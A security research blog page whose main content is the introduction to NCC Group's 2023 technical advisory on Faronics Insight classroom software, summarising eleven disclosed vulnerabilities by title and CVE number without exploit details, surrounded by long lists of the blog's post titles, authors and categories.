 * Fuzzing the Easy Way Using Zulu
 * Exploiting CVE-2014-0282
 * Rustproofing Linux (Part 1/4 Leaking Addresses)
 * Machine Learning 102: Attacking Facial Authentication with Poisoned Data
 * Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
 * Using Semgrep with Jupyter Notebook files
 * Announcing NCC Group’s Cryptopals Guided Tour: Set 2
 * Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB
   DFU (CVE-2022-2347)
 * Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store
   (CVE-2023-21433, CVE-2023-21434)
 * Project Bishop: Clustering Web Pages
 * Puckungfu: A NETGEAR WAN Command Injection
 * MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
 * Machine Learning 101: The Integrity of Image (Mis)Classification?
 * Replicating CVEs with KLEE
 * Public Report – VPN by Google One Security Assessment
 * Public Report – Confidential Space Security Review
 * Exploring Prompt Injection Attacks
 * Impersonating Gamers With GPT-2
 * So long and thanks for all the 0day
 * A jq255 Elliptic Curve Specification, and a Retrospective
 * Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
 * Tool Release – Web3 Decoder Burp Suite Extension
 * Tales of Windows detection opportunities for an implant framework
 * Check out our new Microcorruption challenges!
 * Toner Deaf – Printing your next persistence (Hexacon 2022)
 * Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and
   Related Classes
 * Public Report – IOV Labs powHSM Security Assessment
 * Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and
   CSF Tampering on NXP i.MX Devices
 * A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a
   ShadowPad intrusion
 * Detecting Mimikatz with Busylight
 * Whitepaper – Project Triforce: Run AFL On Everything (2017)
 * Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
 * Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router
   (CVE-2022-37413, CVE-2022-37414)
 * A Guide to Improving Security Through Infrastructure-as-Code
 * Tool Release – ScoutSuite 5.12.0
 * Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter
   Selection Review
 * Tool Release – Monkey365
 * Sharkbot is back in Google Play 
 * Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
 * There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
 * Conference Talks – September/October 2022
 * SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
 * Writing FreeBSD Kernel Modules in Rust
 * NCC Con Europe 2022 – Pwn2Own Austin Presentations
 * Tool Release – JWT-Reauth
 * Back in Black: Unlocking a LockBit 3.0 Ransomware Attack 
 * Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
 * Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 
 * Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
 * Top of the Pops: Three common ransomware entry techniques
 * NCC Group Research at Black Hat USA 2022 and DEF CON 30
 * Tool Release – insject: A Linux Namespace Injector
 * Technical Advisory – Multiple vulnerabilities in Nuki smart locks
   (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507,
   CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508,
   CVE-2022-32505)
 * NIST Selects Post-Quantum Algorithms for Standardization
 * Climbing Mount Everest: Black-Byte Bytes Back?
 * Five Essential Machine Learning Security Papers
 * Whitepaper – Practical Attacks on Machine Learning Systems
 * Flubot: the evolution of a notorious Android Banking Malware
 * A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would
   have prevented
 * Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control
   link
 * Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities
   in U-Boot (CVE-2022-30790, CVE-2022-30552)
 * Understanding the Impact of Ransomware on Patient Outcomes – Do We Know
   Enough?
 * Public Report – Threshold ECDSA Cryptography Review
 * Exception Handling and Data Integrity in Salesforce
 * Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi
   Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328,
   CVE-2022-30329)
 * Shining the Light on Black Basta
 * Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790,
   CVE-2022-30552)
 * NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible
   Reports through the Intel Circuit Breaker program
 * Conference Talks – June 2022
 * Hardware Security By Design: ESP32 Guidance
 * Public Report – Lantern and Replica Security Assessment
 * NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher
   Leaderboard
 * Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 –
   Unauthenticated Command Injection ( CVE-2022-31794 and CVE-2022-31795)
 * Public Report – go-cose Security Assessment
 * Technical Advisory – SerComm h500s – Authenticated Remote Command Execution
   (CVE-2021-44080)
 * Metastealer – filling the Racoon void
 * earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s
   decompiler internals to make automatic P-Code analysis scripts
 * Tool Release – Ghostrings
 * Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo
   Smart Locks Vulnerable to Relay Attacks
 * Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to
   Relay Attacks
 * Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
 * Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView
   tag helpers (CVE-2022-27777)
 * North Korea’s Lazarus: their initial access trade-craft using social media
   and social engineering
 * Adventures in the land of BumbleBee – a new malicious loader
 * LAPSUS$: Recent techniques, tactics and procedures
 * Real World Cryptography Conference 2022
 * Mitigating the top 10 security threats to GCP using the CIS Google Cloud
   Platform Foundation Benchmark
 * A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
 * Public Report – Google Enterprise API Security Assessment
 * Conti-nuation: methods and techniques observed in operations post the leaks
 * Whitepaper – Double Fetch Vulnerabilities in C and C++
 * Mining data from Cobalt Strike beacons
 * Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
 * Tool Release – ScoutSuite 5.11.0
 * Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
 * Microsoft announces the WMIC command is being retired, Long Live PowerShell
 * SharkBot: a “new” generation Android banking Trojan being distributed on
   Google Play Store
 * Estimating the Bit Security of Pairing-Friendly Curves
 * Detecting anomalous Vectored Exception Handlers on Windows
 * BrokenPrint: A Netgear stack overflow
 * Hardware & Embedded Systems: A little early effort in security can return a
   huge payoff
 * Public Report – O(1) Labs Mina Client SDK, Signature Library and Base
   Components Cryptography and Implementation Review
 * Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark
   MC3224i printer (part 2)
 * Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5
   Attacks vs the CIS Microsoft 365 Foundation Benchmark
 * Bypassing software update package encryption – extracting the Lexmark MC3224i
   printer firmware (part 1)
 * Detecting Karakurt – an extortion focused threat actor
 * BAT: a Fast and Small Key Encapsulation Mechanism
 * Testing Infrastructure-as-Code Using Dynamic Tooling
 * Machine Learning for Static Analysis of Malware – Expansion of Research Scope
 * 10 real-world stories of how we’ve compromised CI/CD pipelines
 * NCC Group’s 2021 Annual Research Report
 * On the malicious use of large language models like GPT-3
 * Exploring the Security & Privacy of Canada’s Digital Proof of Vaccination
   Programs
 * Tool Update – ruby-trace: A Low-Level Tracer for Ruby
 * Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches
 * Technical Advisory – Lenovo ImController Local Privilege Escalation
   (CVE-2021-3922, CVE-2021-3969)
 * Choosing the Right MCU for Your Embedded Device — Desired Security Features
   of Microcontrollers
 * FPGAs: Security Through Obscurity?
 * Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
 * log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
 * Log4Shell: Reconnaissance and post exploitation network detection
 * Announcing NCC Group’s Cryptopals Guided Tour!
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary
   File Deletion
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
 * Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated
   Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
 * Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote
   Command Execution (CVE-2021-20044)
 * Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow
   (CVE-2021-20043)
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload
   Path Traversal (CVE-2021-20040)
 * Why IoT Security Matters
 * Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom
   CA Network Flow Analysis (CVE-2021-44050)
 * Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates
   with the Half-Space-Trees Algorithm
 * Tracking a P2P network related to TA505
 * Conference Talks – December 2021
 * Public Report – Zendoo Proof Verifier Cryptography Review
 * An Illustrated Guide to Elliptic Curve Cryptography Validation
 * Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
 * POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
 * Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router
   (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
 * “We wait, because we know you.” Inside the ransomware negotiation economics.
 * Detection Engineering for Kubernetes clusters
 * Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
 * Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA
   Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568,
   CVE-2021-43571)
 * TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial
   access
 * Public Report – Zcash NU5 Cryptography Review
 * The Next C Language Standard (C23)
 * Conference Talks – November 2021
 * Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
 * Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
 * Cracking RDP NLA Supplied Credentials for Threat Intelligence
 * Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the
   Internet
 * Enterprise-scale seamless onboarding and deployment of Azure Sentinel using
   Lighthouse for multi-tenant environments
 * Cracking Random Number Generators using Machine Learning – Part 2: Mersenne
   Twister
 * Cracking Random Number Generators using Machine Learning – Part 1:
   xorshift128
 * NCC Group placed first in global 5G Cyber Security Hack competition
 * Paradoxical Compression with Verifiable Delay Functions
 * A Look At Some Real-World Obfuscation Techniques
 * SnapMC skips ransomware, steals data
 * The Challenges of Fuzzing 5G Protocols
 * Reverse engineering and decrypting CyberArk vault credential files
 * Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session
   Establishment on UPF (CVE-2021-41794)
 * Assessing the security and privacy of Vaccine Passports
 * Technical Advisory – NULL Pointer Derefence in McAfee Drive
   Encryption (CVE-2021-23893)
 * Conference Talks – October 2021
 * Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
 * Detecting and Hunting for the PetitPotam NTLM Relay Attack
 * Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI
   (CVE-2021-39307)
 * Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
 * CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
 * NSA & CISA Kubernetes Security Guidance – A Critical Review
 * Technical Advisory – New York State Excelsior Pass Vaccine Passport
   Credential Forgery
 * Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner
   App Sends Data to a Third Party not Specified in Privacy Policy
 * Conference Talks – September 2021
 * The ABCs of NFC chip security
 * CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
 * Disabling Office Macros to Reduce Malware Infections
 * Some Musings on Common (eBPF) Linux Tracing Bugs
 * Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive
   Extraction – CVE-2021-22937 (Patch Bypass)
 * Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection
   (CVE-2021-36380)
 * Practical Considerations of Right-to-Repair Legislation
 * Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
 * Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log
   Server (CVE-2021-35478,CVE-2021-35479)
 * Detecting and Hunting for the Malicious NetFilter Driver
 * CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
 * NCC Group Research at Black Hat USA 2021 and DEF CON 29
 * Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
 * Software-Based Fault Injection Countermeasures (Part 2/3)
 * An Introduction to Fault Injection (Part 1/3)
 * Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite
   (CVE-2021-21586, CVE-2021-21587)
 * Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare
   vCenter Server 7.0
 * Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
 * Tool Release – Reliably-checked String Library Binding
 * Are you oversharing (in Salesforce)? Our new tool could sniff it out!
 * Exploit mitigations: keeping up with evolving and complex software/hardware
 * NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use
   Against Security Researchers
 * Handy guide to a new Fivehands ransomware variant
 * On the Use of Pedersen Commitments for Confidential Payments
 * Incremental Machine Learning by Example: Detecting Suspicious Activity with
   Zeek Data Streams, River, and JA3 Hashes
 * Testing Two-Factor Authentication
 * Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
 * Research Paper – Machine Learning for Static Malware Analysis, with
   University College London
 * Conference Talks – June 2021
 * Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and
   Implementation Review
 * iOS User Enrollment and Trusted Certificates
 * Detecting Rclone – An Effective Tool for Exfiltration
 * Supply Chain Security Begins with Secure Software Development
 * Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re
   cryptographically random)
 * Public Report – Dell Secured Component Verification
 * RM3 – Curiosities of the wildest banking malware
 * Conference Talks – May 2021
 * A Census of Deployed Pulse Connect Secure (PCS) Versions
 * NCC Group’s Upcoming Trainings at Black Hat USA 2021
 * Public Report – VPN by Google One: Technical Security & Privacy Assessment
 * Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s
   servers on startup
 * Tool Release – Principal Mapper v1.1.0 Update
 * SAML XML Injection
 * The Future of C Code Review
 * RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API
   vulnerabilities CVE-2021-22986
 * Tool Release – Solitude: A privacy analysis tool
 * Deception Engineering: exploring the use of Windows Installer Packages
   against first stage payloads
 * Lending a hand to the community – Covenant v0.7 Updates
 * Technical Advisory: Dell SupportAssist Local Privilege Escalation
   (CVE-2021-21518)
 * Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus
   JGS516PE / GS116Ev2 Switches
 * Deception Engineering: exploring the use of Windows Service Canaries against
   ransomware
 * Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
 * Technical Advisory: Administrative Passcode Recovery and Authenticated Remote
   Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309,
   CVE-2021-25306)
 * Cryptopals: Exploiting CBC Padding Oracles
 * Investigating Potential Security Vulnerability Manifestation through Various
   Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be
   Improved)
 * NCC Group’s 2020 Annual Research Report
 * Conference Talks – February/March 2021
 * Software Verification and Analysis Using Z3
 * Technical Advisory – Linksys WRT160NL – Authenticated Command Injection
   (CVE-2021-25310)
 * Real World Cryptography Conference 2021: A Virtual Experience
 * RIFT: Analysing a Lazarus Shellcode Execution Method
 * MSSQL Lateral Movement
 * Public Report – BLST Cryptographic Implementation Review
 * Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
 * Abusing cloud services to fly under the radar
 * Building an RDP Credential Catcher for Threat Intelligence
 * Double-odd Elliptic Curves
 * Using AWS and Azure for Cost Effective Log Ingestion with Data Processing
   Pipelines for SIEMs
 * Domestic IoT Nightmares: Smart Doorbells
 * Technical Advisory: OS Command Injection in Silver Peak EdgeConnect
   Appliances (CVE-2020-12148, CVE-2020-12149)
 * Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot
   Configuration Auditing Introduced in Depthcharge v0.2.0
 * An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered
   Harmful
 * ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
 * Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP
   Signatures
 * ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial
   and Business Networks
 * Tool Release – Carnivore: Microsoft External Assessment Tool
 * Technical Advisory: containerd – containerd-shim API Exposed to Host Network
   Containers (CVE-2020-15257)
 * Conference Talks – December 2020
 * TA505: A Brief History Of Their Time
 * Decrypting OpenSSH sessions for fun and profit
 * Past, Present and Future of Effective C
 * Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS)
   Vulnerabilities in Oracle Communications Diameter Signaling Router
   (CVE-2020-14787, CVE-2020-14788)
 * Technical Advisory: Command Injection
 * Conference Talks – November 2020
 * Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon
   Message (CVE-2020-8255)
 * Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip
   Extraction (CVE-2020-8260)
 * Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code
   Execution (CVE-2020-27162)
 * Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation
   Bypass (CVE-2020-27161)
 * Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
 * Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow
   (CVE-2020-26561)
 * There’s A Hole In Your SoC: Glitching The MediaTek BootROM
 * RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and
   CVE-2020-8196 honeypot data release
 * Technical Advisory – Pulse Connect Secure – RCE via Template Injection
   (CVE-2020-8243)
 * Tool – Windows Executable Memory Page Delta Reporter
 * Salesforce Security with Remote Working
 * Tool Release – ScoutSuite 5.10
 * Conference Talks – October 2020
 * Tool Release – ICPin, an integrity-check and anti-debug detection pintool
 * Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
 * Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP
   Method Interchange (CVE-2020-13658)
 * Online Casino Roulette – A guideline for penetration testers and security
   researchers
 * Extending a Thinkst Canary to become an interactive honeypot
 * StreamDivert: Relaying (specific) network connections
 * Public Report – Electric Coin Company NU4 Cryptographic Specification and
   Implementation Review
 * Machine learning from idea to reality: a PowerShell case study
 * Conference Talks – September 2020
 * Whitepaper – Exploring the Security of KaiOS Mobile Applications
 * Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack
   (CVE-2020-24613)
 * Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS
   Pre-installed Mobile Applications
 * Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP
   application
 * Immortalising 20 Years of Epic Research
 * Pairing over BLS12-381, Part 3: Pairing!
 * Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
 * NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers
   in 2020
 * Lights, Camera, HACKED! An insight into the world of popular IP Cameras
 * Conference Talks – August 2020
 * Tool Release – Winstrument: An Instrumentation Framework for Windows
   Application Assessments
 * Tool Release: Sinking U-Boots with Depthcharge
 * Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to
   device compromise on TP-Link C200 IP Camera
 * Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
 * Pairing over BLS12-381, Part 2: Curves
 * Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability
   CVE-2020-5902
 * RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and
   CVE-2020-8196 Intelligence
 * An offensive guide to the Authorization Code grant
 * Technical Advisory – KwikTag Web Admin Authentication Bypass
 * Pairing over BLS12-381, Part 1: Fields
 * RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
   Intelligence
 * Experiments in Extending Thinkst Canary – Part 1
 * Tool Release – ScoutSuite 5.9.0
 * Technical Advisory – macOS Installer Local Root Privilege Escalation
   (CVE-2020-9817)
 * Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to
   make threat actors work harder and fail more often
 * How-to: Importing WStalker CSV (and more) into Burp Suite via Import to
   Sitemap Extension
 * Tool: WStalker – an easy proxy to support Web API assessments
 * Security Considerations of zk-SNARK Parameter Multi-Party Computation
 * WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
 * Tool Release – Socks Over RDP Now Works With Citrix
 * Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
 * Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
 * Cyber Security of New Space Paper
 * In-depth analysis of the new Team9 malware family
 * Common Insecure Practices with Configuring and Extending Salesforce
 * Exploring DeepFake Capabilities & Mitigation Strategies with University
   College London
 * Game Security
 * Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
 * Research Report – Zephyr and MCUboot Security Assessment
 * CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a
   better read/write primitive
 * CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read
   and write primitive
 * Using SharePoint as a Phishing Platform
 * Public Report – Coda Cryptographic Review
 * Shell Arithmetic Expansion and Evaluation Abuse
 * CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition
   and debugging tricks
 * Tool Release – Socks Over RDP
 * Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
 * CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic
   triggering
 * Practical Machine Learning for Random (Filename) Detection
 * Curve9767 and Fast Signature Verification
 * CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
 * The Extended AWS Security Ramp-Up Guide
 * Adam Roberts
 * Anthony Ferrillo
 * Aaron Greetham
 * Aaron Haymore
 * Alberto Verza
 * Aleksandar Kircanski
 * Alessandro Fanio Gonzalez
 * Alessandro Fanio González
 * Alex Plaskett
 * Alex Zaviyalov
 * Alvaro Martin Fraguas
 * Álvaro Martín Fraguas
 * Andrea Shirley-Bellande
 * Drew Wade
 * Andy Davis
 * Andy Grant
 * Antonis Terefos
 * anvesh3752
 * Alexander Smye
 * aschmitz
 * Author Test
 * Ava Howell
 * Andrew Whistlecroft
 * balazs.bucsay
 * Nicolas Bidron
 * NCC Group Physical Breach Team
 * Rich Warren
 * Caleb Watt
 * Clinton Carpene
 * Cedric Halbronn
 * chrisanley
 * Christo Butcher
 * Clayton Lowell
 * Clint Gibler
 * cnevncc
 * Contributor Test
 * corancc
 * Corey Arthur
 * Christian Powills
 * Craig Blackie
 * Catalin Visinescu
 * Ken Wolstencroft
 * Dale Pavey
 * Damon Small
 * Dan Hastings
 * Dave G.
 * David Tulis
 * David Cash
 * Daniele Costa
 * destoken
 * Diana Dragusin
 * Diego Gomez Maranon
 * Diego Gómez Marañon
 * Domen Puncer Kugler
 * Daniel Romero
 * Deni
 * David Young
 * Edward Torkington
 * Exploit Development Group
 * elenabakoslang
 * Eli Sohl
 * epliuncc
 * Erik Schamper
 * Erik Steringer
 * Eric Schorn
 * fernandogallegopinero
 * Aaron Adams
 * Gavin Cotter (Temp)
 * Gerald Doussot
 * Gérald Doussot
 * Giacomo Pope
 * Global Threat Intelligence
 * Guy Morley
 * William Handy
 * Liew hock lai
 * Hollie Mowatt
 * Heather Overcash
 * Rob Wood
 * Iain Smart
 * Izzy Whistlecroft
 * Jacob Heath
 * Jameson Hyde
 * Phillip Langlois and Edward Torkington
 * Jashan Benawra
 * Jason Kielpinski
 * Javed Samuel
 * James Chambers
 * Jelle Vergeer
 * Jennifer Reed
 * Jeremy Boone
 * Jerome Smith
 * Jesus Calderon Marin
 * Jesús Calderón Marín
 * Jay Houppermans
 * Jack Leadford
 * Joshua Makinen
 * John Redford
 * Joost Jansen
 * Joshua Dow
 * Jose Selvi
 * Kenneth Yu
 * Kat Sommer
 * Katarina Dabler
 * Ben Lister
 * Krijn de Mik
 * Lars Behrens
 * Lawrence Munro
 * Liam Glanfield
 * Liam Stevenson
 * Liyun Li
 * Lucas Rosevear
 * Luke Paris
 * Matt Lewis
 * Manuel Gines
 * Margit Hazenbroek
 * Marie-Sarah Lacharite
 * Mario Rivas
 * NCC Group & Fox-IT Data Science Team
 * Max Groot
 * McCaulay Hudson
 * Michael Gough
 * Mostafa Hassan
 * Matthew Pettitt
 * Frank Gifford
 * Michelle Simpson
 * Neil Bergman
 * NCC Group
 * NCC Group Publication Archive
 * Bill Marquette
 * Daniel Lopezjimenez
 * nccdavid
 * Dan Helton
 * RIFT: Research and Intelligence Fusion Team
 * R.Rivera
 * NCC Group Red Team
 * Ilya Zhuravlev
 * Jennifer Fernick
 * ncckai
 * Lewis Lockwood
 * Jon Szymaniak
 * Mark Manning
 * nccmarktedman
 * Michael Sandee
 * Simon Palmer
 * nccricardomr
 * Stefano Antenucci
 * Simone Salucci and Daniel Lopez Jimenez
 * Samuel Siu
 * Tanner Prynn
 * Yun Zheng Hu
 * Stephen Tomkinson
 * Nicolas Guigo
 * Nick Galloway
 * Nick Muir
 * Nick Dunn
 * Nick Sirris
 * Nikolaos Pantazopoulos
 * Oliver Brooks
 * Ollie Whitehouse
 * Ollie Wen
 * Parnian Alimi
 * Paul Bottinelli
 * Peter Scopes
 * Peter Hannay
 * philipmarsdennccgroupcom
 * Pixel Kicks
 * Pixel Kicks
 * pixelkicks-fiona
 * pixelkicks-fred
 * pixelkicks-matt.hamer
 * pixelkicks-turhan
 * pixelkicks-will
 * pqueenncc
 * Philipp Schaefer
 * qkchambers
 * Rory McCune
 * Rami McCarthy
 * Ray Lai
 * Robert C. Seacord
 * Rennie deGraaf
 * Chris Nevin
 * Richard Appleby
 * Rick Veldhoven
 * Fumik0_
 * Rindert Kramer
 * Rob Ince
 * robertgrimes123
 * Robert Wessen
 * Ross Bradley
 * Robert Schwass
 * sampeate
 * Roger Meyer
 * schlopeckincc
 * Siddarth Adukia
 * Sam Leonard (they/them)
 * Spencer Michaels
 * sean.morland@nccgroup.com
 * Sander de Jong
 * Stuart Kurutac
 * Subscriber Test
 * Sultan Khan
 * Swathi Nagarajan
 * Simon Watson
 * Jeff Dileo
 * Thomas Marshall
 * Ivan Reedman
 * Thomas Pornin
 * Jeremy Boone
 * Viktor Gazdag
 * Vishtasp Jokhi
 * Wouter Jansen
 * William Groesbeck
 * whoughtonncc
 * Wordpress SSO Test
 * Xavier Garceau-Aranda
 * Ken Gannon
 * Kevin Henry
 * 5G Security & Smart Environments
 * Academic Partnership
 * Annual Research Report
 * Asia Pacific Research
 * Awards & Recognition
 * Books
 * Business Insights
 * CIRT
 * Cloud & Containerization
 * Cloud Security
 * Conferences
 * Corporate
 * Cryptography
 * CTFs/Microcorruption
 * Current events
 * Cyber as a Science
 * Cyber Security
 * Detection and Threat Hunting
 * Disclosure Policy
 * Emerging Technologies
 * Engineering
 * Fox-IT
 * Fox-IT and European Research
 * Gaming & Media
 * Hardware & Embedded Systems
 * Intern Projects
 * iSec Partners
 * Machine Learning
 * Managed Detection & Response
 * Misinformation, Deepfakes, & Synthetic Media
 * North American Research
 * Offensive Security & Artificial Intelligence
 * Patch notifications
 * Presentations
 * protocol_name
 * Public interest technology
 * Public interest technology
 * Public Reports
 * Public tools
 * Reducing Vulnerabilities at Scale
 * Research
 * Research Paper
 * Reverse Engineering
 * Risk Management & Governance
 * Standards
 * Technical advisories
 * Technology Policy
 * Threat briefs
 * Threat Intelligence
 * Tool Release
 * Transport
 * Tutorial/Study Guide
 * UK Research
 * Uncategorized
 * Virtualization, Emulation, & Containerization
 * VSR
 * Vulnerability
 * Whitepapers

 * nccgroup.com
 * Support

 * 2021 Research Report
 * Public Reports
 * Contact


Back
Oliver Brooks
Technical advisories
Vulnerability

May 30, 2023

23 mins read


TECHNICAL ADVISORY – MULTIPLE VULNERABILITIES IN FARONICS INSIGHT
(CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347, CVE-2023-28348,
CVE-2023-28349, CVE-2023-28350, CVE-2023-28351, CVE-2023-28352, CVE-2023-28353)


INTRODUCTION

Faronics Insight is a feature rich software platform which is deployed on
premises in schools. The application enables teachers to administer, control and
interact with student devices. The application contains numerous features,
including allowing teachers to transfer files to/from students and remotely
viewing the contents of student screens.

Generally speaking, the architecture of the application is a classic
client/server model – the “server” is the Teacher Console and each “client” is a
Student Console deployed on every student machine in a classroom.

A number of flaws were identified in the Faronics Insight software product, with
consequences ranging from person-in-the-middle attacks on data transmitted
between Student Consoles and Teacher Consoles to Remote Code Execution (RCE) as
SYSTEM on any active Student or Teacher console.

Overall, 11 vulnerabilities were identified, with links to their technical
advisories below:

 1.  Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles
 2.  Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)
 3.  RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)
 4.  RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)
 5.  RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)
 6.  All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)
 7.  Enhanced Security Mode May Be Bypassed (CVE-2023-28352)
 8.  Virtual Host Routing Can Be Defeated (CVE-2023-28346)
 9.  Keystroke Logs Are Stored in Plaintext in a World Readable Directory
     (CVE-2023-28351)
 10. Lack of Access Controls on Student APIs (CVE-2023-28344)
 11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)

Vulnerability research was performed against Faronics Insight v11.21.2100.262
available on https://faronics.com.

